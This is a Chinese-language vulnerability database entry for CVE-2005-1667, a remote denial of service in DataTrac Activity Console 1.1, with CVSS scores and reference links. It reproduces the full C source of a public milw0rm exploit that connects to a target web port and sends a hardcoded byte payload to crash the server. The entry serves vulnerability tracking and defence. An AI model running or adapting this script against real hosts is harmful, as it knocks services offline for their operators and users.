CVE-2005-1667
CVSS5.0
发布时间 :2005-05-18 00:00:00
修订时间 :2008-09-10 15:39:52
NMCOE    

[原文]DataTrac Activity Console 1.1 allows remote attackers to cause a denial of service via a long HTTP GET request.


[CNNVD]DataTrac远程拒绝服务漏洞(CNNVD-200505-1112)

        DataTrac Activity Console 1.1允许远程攻击者通过一个长的HTTP GET请求来发起拒绝服务攻击。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1667
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1667
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1112
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/13558
(UNKNOWN)  BID  13558
http://www.securiteam.com/windowsntfocus/5FP052AFPA.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5FP052AFPA.html
http://www.osvdb.org/16168
(UNKNOWN)  OSVDB  16168
http://secunia.com/advisories/15291
(UNKNOWN)  SECUNIA  15291
http://milw0rm.com/exploits/983
(UNKNOWN)  MILW0RM  983

- 漏洞信息

DataTrac远程拒绝服务漏洞
中危 其他
2005-05-18 00:00:00 2005-10-20 00:00:00
远程  
        DataTrac Activity Console 1.1允许远程攻击者通过一个长的HTTP GET请求来发起拒绝服务攻击。

- 公告与补丁

        暂无数据

- 漏洞信息 (983)

DataTrac Activity Console Denial of Service Exploit (EDBID:983)
windows dos
2005-05-06 Verified
0 basher13
N/A [点击下载]
/*

DataTrac Activity Console DoS Exploit
----------------------------------------
 INFGP - Hacking&security Research

Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed

Greats: Infam0us Gr0up,Yudha(mephisthopeles),Kavling Community,
1st Indonesian Security,Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous

*/

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf("     DataTrac Activity Console DoS Exploit \n", argv[0]);
printf("  ------------------------------------------\n", argv[0]);
printf("      INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [source port]\n", argv[0]);
printf("[?]Exam: %s localhost 13\n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 80;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf("     DataTrac Activity Console DoS Exploit \n", argv[0]);
printf("  ------------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}

// milw0rm.com [2005-05-06]
		

- 漏洞信息

16168
DataTrac Application Server Text String Overflow DoS
Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-08 Unknow
2005-05-08 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站